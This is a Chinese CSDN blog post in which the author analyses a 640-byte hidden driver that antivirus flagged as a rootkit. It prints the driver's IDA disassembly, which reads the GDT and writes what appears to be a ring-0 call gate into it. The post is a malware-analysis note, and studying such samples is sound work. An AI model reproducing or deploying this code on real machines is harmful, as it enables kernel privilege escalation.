一个奇怪的隐藏文件

最新推荐文章于 2021-11-27 11:41:57 发布
最新推荐文章于 2021-11-27 11:41:57 发布
阅读量948 收藏
点赞数
分类专栏: 所有文章 文章标签: permissions attributes byte c
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/thinkSJ/article/details/1177080
版权

前几日在我的机子上,发现了一个了隐藏的SYS文件,AntiVir报毒为RootKit,看了一下才发现原来它很苗条,只是640Bytes,很有秀惑力吧:
.text:00010200                 .686p
.text:00010200                 .mmx
.text:00010200                 .model flat
.text:00010200
.text:00010200 ; 屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯?
.text:00010200
.text:00010200 ; Segment type: Pure code
.text:00010200 ; Segment permissions: Read/Execute
.text:00010200 _text           segment para public 'CODE' use32
.text:00010200                 assume cs:_text
.text:00010200                 ;org 10200h
.text:00010200                 assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing
.text:00010200
.text:00010200 ; 圹圹圹圹圹圹圹?S U B R O U T I N E 圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹?
.text:00010200
.text:00010200 ; Attributes: bp-based frame
.text:00010200
.text:00010200                 public start
.text:00010200 start           proc near
.text:00010200
.text:00010200 var_2A          = qword ptr -2Ah
.text:00010200
.text:00010200                 push    ebp
.text:00010201                 mov     ebp, esp
.text:00010203                 nop
.text:00010204                 nop
.text:00010205                 nop
.text:00010206                 nop
.text:00010207                 pushf
.text:00010208                 pusha
.text:00010209                 push    edx
.text:0001020A                 sgdt    [esp+28h+var_2A]
.text:0001020F                 pop     edx
.text:00010210                 mov     eax, edx
.text:00010212                 mov     ecx, 3E0h
.text:00010217                 mov     byte ptr [edx], 0C3h
.text:0001021A                 mov     [ecx+edx], ax
.text:0001021E                 shr     eax, 10h
.text:00010221                 mov     [ecx+edx+6], ax
.text:00010226                 mov     dword ptr [ecx+edx+2], 0EC0003E8h
.text:0001022E                 mov     dword ptr [ecx+edx+8], 0FFFFh
.text:00010236                 mov     dword ptr [ecx+edx+0Ch], 0CF9A00h
.text:0001023E                 popa
.text:0001023F                 popf
.text:00010240                 mov     eax, 0
.text:00010245                 leave
.text:00010246                 retn    8
.text:00010246 start           endp
.text:00010246
.text:00010246 ; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪?
.text:00010249                 align 20h
.text:00010249 _text           ends
.text:00010249
.text:00010249
.text:00010249                 end start

单从这段代码上来看,好像没有隐藏文件的功能,肯定还有其它的不干净东西,录找中.
 发贴留个纪念

thinkSJ
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
攻防世界逆向高手题之re2-cpp-is-awesome
沐一 · 林 的博客
09-05 859
攻防世界逆向高手题之re2-cpp-is-awesome 继续开启全栈梦想之逆向之旅~ 这题是攻防世界逆向高手题的re2-cpp-is-awesome 下载附件,照例扔入exeinfope中查看信息: 64位ELF文件,无壳,运行一下查看主要显示字符串: 照例扔入IDA中查看伪代码,有main函数看main函数: C++面向对象的代码有点乱,也有点杂,在string中追踪Better luck next time字符串跟踪出在下图的第一个红框处: C++代码比较陌生,但是根据前面做题中积累的经验中
[汇编]伪指令(二)
极品小肥羊的博客
07-20 4439
[汇编]伪指令(二) 数据定义及存储器分配伪指令   80x86提供了各种数据及存储器分配伪指令,这些伪指令在汇编程序对源程序进行汇编期间,由汇编程序完成数据类型定义及存储器分配等功能。   数据定义及存储器分配伪指令的格式是:  [变量] 助记符 操作数[, …,操作数] [ ;注释]   下面介绍ORG伪指令以及常用的数据定义伪指令。   ORG(origi
不要把MASM32开发环境和MASM汇编器版本搞混了!
O(1) 的小乐
03-08 1483
MASM32 是一个为那些对学习或者编写 32 位微软汇编( MASM )感兴趣 的程序员提供的工作环境,它最流行的版本是 8.0 版,而我所知道最新版本是 9.0 版。但是请大家一定要注意,这里的 8.0 版和 9.0 版不是指 MASM 编译器 ( 即 ML) 的版本,而是 MASM32 开发环境的版本。 经常看到网上有网友发的贴把这两个概念都搞混了。 那么 MASM(ML) 编译器的版本
BUUCTF - [GWCTF 2019]xxor 1
:-)
11-27 1702
[GWCTF 2019]xxor 1 其实看到这道题的名字,我感觉它做了两次异或操作 ,废话不多说,开始分析 64位ELF,打开Linux运行一下 大概是输入6个字符,经行位操作,然后判断吧,拖进ida分析下 思路很清晰的一道逆向题目,应该考验的是对数据存储的理解和写脚本的能力,研究一下它的逻辑 这应该就是它的关键函数了,之前的input1数组是把输入的数据存起来,然后经行操作后存到v7中进行判断 注意HIDWORD()和LODWORD()的宏定义 #define HIDWORD(x) (*((_
WAVE头分析代码
old-li的blog
05-01 5789
 这篇文章是网络上流行的比较广泛的针对WAVE头分析的文章, 整体写的简单明了非常好,但是 18H 2 int
隐藏文件文件夹两个都选问题
05-31
在计算机操作过程中,有时我们会遇到一些奇怪的现象,比如在“工具-文件夹选项-查看”设置中,“隐藏文件文件夹”选项被同时选中,导致无法正常查看隐藏文件文件夹。本文将详细介绍这一现象的原因、可能产生的...
将rar文件隐藏在图片中的实现方法
09-22
经常看到网页上是一个图片,但可以另存为保存为rar文件,并可以解压,比较奇怪的事,这样的木马一般就是用免费的图片空间,以为只让存图片不让存文件的缘故吧。
随便做的奇怪的东西-少儿编程scratch项目源代码文件案例素材.zip
最新发布
11-09
本篇文章将深入探讨一个名为“随便做的奇怪的东西”的少儿编程项目,该项目使用了广受欢迎的编程工具——Scratch,为孩子们提供了一个有趣的源代码学习案例。 Scratch是由麻省理工学院(MIT)的媒体实验室 Lifelong ...
奇怪的EXCEL文件
09-11
标题中的“奇怪的EXCEL文件”可能是指在处理一个Excel工作簿时遇到了不寻常的问题。描述中的信息提供了更具体的细节,让我们逐点分析这些异常情况。 1. **A6公式问题**:在Excel中,A6通常指的是单元格引用,可能是...
32位和64位系统内核函数调用从ZwProtectVirtualMemory到NtProtectVirtualMemory
weixin_30624825的博客
09-01 1002
0x01 前言   我们知道R3层中,Zw系列函数和Nt系列函数函数是一样的,但是在内核Zw系列函数调用了Nt系列函数,但是为什么要在内核设置一个Zw系列函数而不是直接调用Nt函数呢?Zw系列函数又是怎么调用Nt系列函数的呢?我们利用IDA分析NtosKrnl.exe文件。 0x02 ZwProtectVirtualMemory   我们先看看ZwProtectVirtualMemor...
Wow64cpu!CpuSimulate的一点点分析
lif12345的专栏
06-29 2316
.text:0000000078B625B0 CpuSimulate proc near ; DATA XREF: .text:off_78B63168o .text:0000000078B625B0 ; .pdata:0000000078B650B4o .text:00000000...
ida反编译程序 linux,[求助]IDA反汇编一个软件后的main函数的求助
weixin_31935149的博客
05-10 322
一个软件反汇编,这个软件实现的是在linux上输入./cmd -i filename(后面还会有一些选项命令-m mode、-q xxx什么的)会将这个文件进行一定的算法后得到新的数据后生成一个文件,但是反汇编后产生的main函数却是完全不懂.text:0000000000400190 public start.text:0000000000400190...
[转]失业的娱乐-IDA逆向工程入门
热门推荐
c_cacal的专栏
10-10 1万+
【文章标题】: 失业的娱乐-IDA逆向工程入门(一)【文章作者】: layper【作者邮箱】: layper@yahoo.com.cn【作者主页】: http://blog.csdn.net/layper/【下载地址】: 自己搜索下载【作者声明】: 只是感兴趣,没有其他目的。失误之处敬请诸位大侠赐教!-------------------------------------------------
奇怪的题目
走刀口→超
07-15 890
某地发生了一件谋杀案,警察通过排查确定杀人凶手为4个嫌疑犯中的一个。以下为4个嫌疑犯的供词。A说:不是我。B说:是C。C说:是D。D说:C在胡说。已知3个人说了真话,1个人说的是假话。现在请根据这些信息,写一个程序来确定到底谁是凶手。就这么一个题目,如果是我,我觉得很难和程序联系起来,以为是八杆子打不到的事。具体分析:A说:不是我。      -->   killer != AB说:是
SQL Server死锁分析:一个奇怪的案例
"SQL Server上的一个奇怪的Deadlock及其分析方法" 在SQL Server中,死锁(Deadlock)是一个常见的并发问题,它发生在两个或多个事务之间,每个事务都在等待其他事务释放资源,从而导致所有事务都无法继续执行。本文...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值